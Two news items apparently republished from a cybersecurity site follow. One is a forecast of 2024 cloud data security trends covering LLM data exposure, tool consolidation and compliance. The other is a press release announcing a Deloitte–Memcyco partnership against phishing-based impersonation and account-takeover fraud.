As companies begin to move generative AI projects from experimental pilot to production, concerns about data security become paramount. LLMs that are trained on sensitive data can be manipulated to expose that data through prompt injections attacks, and LLMs with access to sensitive data pose compliance, security, and governance risks. The effort around securing LLMs in production will require more organizational focus on data discovery, classification and access governance – in order to create transparency into the data that ‘feeds’ the language model and ensure authorized access to it.

Advancements in AI are just one of many challenges – and opportunities – tech leaders faced in 2023. The continued acceleration of cloud adoption, evolving tactics of bad actors, and increasingly stringent data privacy regulations have contributed to a challenging data security landscape. To address these challenges, security leaders, and the tools and processes they use, must evolve in 2024.

Here are a few other trends I anticipate for 2024.

Consolidation of data security tooling

As organizations moved to the cloud, their infrastructure has become increasingly fragmented. With multi-cloud and containerization becoming de-facto standards, this trend has intensified. Data storage and processing is dispersed, constantly changing, and handled by multiple vendors and dozens of tools.

To secure data, businesses found themselves investing in a broad range of tooling – including DLP for legacy systems; CSP-native solutions; compliance tools; and more. In many cases two separate tools with similar functionality are required due to incompatibility with a specific CSP or data store.

This trend is now reversing. Economic pressures and a growing consensus that licensing and management overhead have become untenable are leading organizations toward renewed consolidation. Businesses are now looking for a single pane of glass to provide unified policy and risk management across multi-cloud, hybrid, and on-premises environments. Security solutions are evolving accordingly – moving from point solutions that protect a specific data store toward more comprehensive platforms that protect the data itself, wherever it’s stored and in transit.

Maturation of compliance programs

Organizations are realizing that compliance needs to be more than an annual box-ticking exercise. With regulators increasingly willing to confront companies over their use and protection of customer data, it’s become clear that compliance needs to be a strategic priority.

Businesses will invest more in programs that enable them to map their existing data assets to compliance requirements, as well as tools that help identify compliance violations in real time – rather than waiting for them to be discovered during an audit (or in the aftermath of a breach).

The post Cloud Data Security in 2024 appeared first on Cybersecurity Insiders.

Memcyco Inc, the real-time digital impersonation detection and prevention solution provider, and Deloitte, the leading consulting, advisory, and audit services firm, today announced their strategic partnership in the cybersecurity sector. The partnership enables Deloitte to extend this range of solutions offering customers Memcyco’s industry-leading anti-impersonation software. The solutions will be offered globally in regions such as the EMEA, LATAM, USA, and others.

Deloitte and Memcyco’s pivotal collaboration combines the former’s consulting expertise with the latter’s cutting-edge platform for detecting and preventing digital impersonation fraud in real time. This alliance will elevate fraud prevention to a new level, helping government organizations, enterprises, and brands protect themselves from damage and safeguard their reputations from being tarnished through attacks that use phishing sites to target their customers. 

By virtue of their partnership, Memcyco and Deloitte will leverage additional solutions related to integration and cooperation, such as Deloitte’s Strategic & Reputation Risk Services. This multidisciplinary synergy ensures a holistic response to threats, capitalizing on each organization’s area of expertise and accumulated experience, thus offering more robust and complete solutions to clients.

Memcyco provides a platform for real-time detection, protection, and response to online impersonation attacks, whereby malicious actors use phishing, smishing, and other techniques to direct customers to fake pages that look and feel much like the real thing. These attacks trick users into giving up their personal data, such as login credentials and credit card information, which is subsequently used for ATO (account takeover) and other online attacks, leading to data breaches, theft of funds, and ransomware.

Unlike other solutions, Memcyco is singularly able to safeguard the “window of exposure” between when a fake website goes live and when the attacker attempts to use stolen data to access company web pages, using real-time alerts to warn users not to trust the spoofed site, as well as tracking attacker and victim activity. Addressing this window is crucial for organizations to be able to protect themselves from data breaches, financial losses, and reputational damage while protecting their customers from identity theft and financial harm. 

Memcyco also provides organizations with full insight into attacks, including a list of all victims. This data not only gives the organization improved visibility, but also helps risk engines to predict fraud more accurately, thereby significantly decreasing remediation costs.

“Memcyco is delighted to build a partnership with Deloitte due to its dedicated team, expertise, and innovation capabilities,” said Israel Mazin, CEO of Memcyco. “Our shared commitment to empowering organizations to make informed decisions about their cybersecurity strategy is at the heart of our collaboration. In the long term, this partnership will pave the way for organizations of all sizes to mitigate impersonation and brandjacking attacks and to gain more trust from their customers.” 

Memcyco will showcase its solutions at the third annual Deloitte Cyber iCON event in Spain on Jan 23, 2024. Cyber iCON allows businesses to gain first-hand knowledge about the most prevalent and sophisticated cyber threats they face today. Attendees will be able to learn about the latest strategies and countermeasures they can employ to safeguard themselves against advanced threats via real-world, interactive scenarios. Memcyco’s representatives will join Deloitte’s experts on-stage to discuss the dangers presented by digital impersonation and to introduce businesses to their comprehensive solution for mitigating such risks. Memcyco will also participate in a joint panel discussion and presentation alongside Deloitte’s expert cybersecurity consultants. 

About Memcyco

Memcyco provides real-time digital impersonation detection, protection and response solutions to companies and their customers. Their real-time, agentless solutions are unique in fully safeguarding the critical “window of exposure” between when a fake site goes live and when an attacker attempts to use stolen data to access company web-pages. Memcyco alerts users who visit fake sites and gives organizations complete visibility into the attack, allowing them to take remediating actions. Led by industry veterans, Memcyco is committed to ensuring the security and digital trust of its customers – and of their customers. For more information, visit www.memcyco.com/.

About Deloitte

Deloitte has contributed to the development of business organizations and society during its more than 175 years of history. Faced with a constantly evolving reality, it has established itself as the advisor of reference for the transformation of large national and multinational companies using a multidisciplinary approach based on excellence, technological innovation and the continuous development of the talent of its professionals, maintaining its position as a leading professional services firm. The organization has strengthened its position by impacting clients, communities and people through the Make an impact that matters initiative, which is implemented in social action programs -WorldClass-, action against climate change -WorldClimate-, and its ALL IN diversity and inclusion strategy. Globally, the firm is present in more than 150 countries, where more than 345,000 professionals work. Learn more at: www.deloitte.com/.

The post Deloitte Partners with Memcyco to Combat ATO and Other Online Attacks with Real-Time Digital Impersonation Protection Solutions appeared first on Cybersecurity Insiders.